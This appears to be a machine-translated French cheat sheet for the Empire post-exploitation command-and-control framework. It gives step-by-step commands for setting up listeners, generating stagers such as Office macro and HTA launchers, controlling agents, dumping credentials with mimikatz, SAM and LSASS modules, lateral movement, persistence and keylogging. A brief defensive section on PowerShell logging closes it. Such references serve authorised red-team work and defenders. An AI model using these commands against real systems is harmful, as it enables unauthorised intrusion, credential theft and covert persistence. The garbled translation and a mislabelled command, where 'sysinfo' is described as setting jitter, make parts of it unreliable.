Feuille de chaleur Empire Framework¶

Copier toutes les commandes Générer PDF

Aperçu général¶

Empire est un cadre post-exploitation qui comprend un agent Windows pur PowerShell 2.0 et un agent Python 3 Linux/macOS pur. Il fournit une puissante infrastructure de commande et de contrôle (C2) pour les opérations de l'équipe rouge, les essais de pénétration et l'émulation adverse.

C'est pas vrai. Attention : Empire est un outil de test de sécurité qui ne devrait être utilisé que dans les environnements où vous avez la permission explicite de le faire.

Installation¶

De GitHub¶

# Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git

# Navigate to the directory
cd Empire

# Run the installation script
sudo ./setup/install.sh

Utilisation de Docker¶

# Pull the Docker image
docker pull bcsecurity/empire:latest

# Run the container
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest
```_

### Sur Kali Linux
```bash
# Install from package manager
sudo apt update
sudo apt install powershell-empire
```_

## Utilisation de base

### Empire de départ
```bash
# Start the Empire server
sudo empire

# Start with REST API (for Starkiller)
sudo empire --rest --username <username> --password <password>

Utilisation de Starkiller (GUI)¶

# Install Starkiller
npm install -g @starkiller/starkiller

# Run Starkiller
starkiller

Command	Description
`help`	Display help menu
`menu`	Return to the main menu
`back`	Go back one menu level
`exit`	Exit Empire
`usemodule <module>`	Select a module to use
`usestager <stager>`	Select a stager to use
`uselistener <listener>`	Select a listener to use
`interact <agent>`	Interact with an agent
`searchmodule <term>`	Search for modules

Auditeurs¶

Création d'un Auditeur¶

# In Empire CLI
listeners
uselistener http
set Name http_listener
set Host 192.168.1.100
set Port 8080
execute

Options d'écoute courantes¶

Option	Description
`Name`	Name for the listener
`Host`	IP/hostname for staging
`Port`	Port for the listener
`CertPath`	Certificate path for HTTPS
`DefaultDelay`	Agent callback delay (in seconds)
`DefaultJitter`	Jitter in agent callbacks (0.0-1.0)
`DefaultProfile`	Default communication profile
`KillDate`	Date for the listener to exit (MM/DD/YYYY)
`WorkingHours`	Hours for the agent to callback (09:00-17:00)

Gestion de l'auditeur¶

# List all listeners
listeners

# Kill a listener
kill http_listener

# View a listener's options
info http_listener

Échelles¶

Générer un stade¶

# In Empire CLI
usestager windows/launcher_bat
set Listener http_listener
generate

Types d'étapes communs¶

Stager	Description
`windows/launcher_bat`	BAT file launcher
`windows/launcher_vbs`	VBS script launcher
`windows/launcher_powershell`	PowerShell launcher
`multi/launcher`	Multi-platform launcher
`osx/launcher`	macOS launcher
`linux/launcher`	Linux launcher
`windows/dll`	DLL launcher
`windows/macro`	Office macro launcher
`windows/hta`	HTA launcher

Agents¶

Commandes d'agents¶

# List all agents
agents

# Interact with an agent
interact C2AGENT123

# Get agent info
info

# Execute a shell command
shell whoami

# Run a PowerShell command
powershell Get-Process

# Upload a file
upload /path/to/local/file /path/on/target

# Download a file
download /path/on/target /local/path

# Take a screenshot
screenshot

# Exit agent menu
back

Gestion des agents¶

# Rename an agent
rename C2AGENT123 new_name

# Kill an agent
kill C2AGENT123

# Remove an agent from the database
remove C2AGENT123

# Set sleep interval
sleep 30

# Set jitter percentage
sysinfo

Modules¶

Utilisation des modules¶

# List available modules
usemodule

# Search for modules
searchmodule credentials

# Use a specific module
usemodule powershell/situational_awareness/network/powerview/get_user

# Set module options
set Username administrator

# Execute the module
execute

Catégories communes de modules¶

Accès aux titres de créance¶

# Dump credentials from memory
usemodule powershell/credentials/mimikatz/logonpasswords

# Dump SAM database
usemodule powershell/credentials/sam

# Dump LSASS process
usemodule powershell/credentials/credential_injection/lsass_dump

Sensibilisation à la situation¶

# Get domain users
usemodule powershell/situational_awareness/network/powerview/get_user

# Get domain computers
usemodule powershell/situational_awareness/network/powerview/get_computer

# Get domain groups
usemodule powershell/situational_awareness/network/powerview/get_group

Mouvement latéral¶

# WMI lateral movement
usemodule powershell/lateral_movement/invoke_wmi

# PSExec lateral movement
usemodule powershell/lateral_movement/invoke_psexec

# WinRM lateral movement
usemodule powershell/lateral_movement/invoke_winrm

Persistance¶

# Registry persistence
usemodule powershell/persistence/userland/registry

# Scheduled task persistence
usemodule powershell/persistence/userland/schtasks

# WMI persistence
usemodule powershell/persistence/elevated/wmi

Caractéristiques avancées¶

Profils C2 malléables¶

# In Empire CLI
profiles
use default
set DefaultProfile /path/to/profile.profile

OPSEC Considérations¶

# Set agent kill date
set KillDate 01/01/2025

# Set working hours
set WorkingHours 09:00-17:00

# Increase agent sleep time
sleep 300 30

Exfiltration des données¶

# Use keylogging module
usemodule powershell/collection/keylogger

# Use clipboard monitoring
usemodule powershell/collection/clipboard_monitor

# Use screenshot module
usemodule powershell/collection/screenshot

Dépannage¶

Questions communes¶

** Problèmes de connexion* *

   # Check if the listener is running
   listeners

   # Verify firewall settings
   sudo iptables -L

   # Check for port conflicts
   netstat -tuln|grep <port>
   ```

2. **Agent ne vérifiant pas En**
```bash
   # Verify agent is running
   agents

   # Check for network connectivity issues
   # Verify sleep/jitter settings
   ```

3. **Défauts d'exécution des modules* *
```bash
   # Check module requirements
   info

   # Verify agent privileges
   shell whoami

   # Try running in a different process context
   usemodule powershell/management/psinject
   ```

## Mesures défensives

### Méthodes de détection
- PowerShell Script Block Logging
- Module PowerShell Logging
- AMSI (Interface de balayage antimalware)
- Analyse du trafic réseau
- Analyse comportementale

### Techniques de prévention
```powershell
# Enable PowerShell Script Block Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1

# Enable PowerShell Module Logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1

# Enable Constrained Language Mode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

Ressources¶

[BC Security GitHub] (LINK_4)
[Empire Wiki] (LINK_4)
[Starkiller GitHub] (LINK_4)
[MITRE ATT&CK - Empire] (LINK_4)

*Cette feuille de triche fournit une référence complète pour l'utilisation d'Empire dans les scénarios de tests de sécurité. Assurez-vous toujours d'avoir une autorisation appropriée avant d'utiliser cet outil dans n'importe quel environnement. *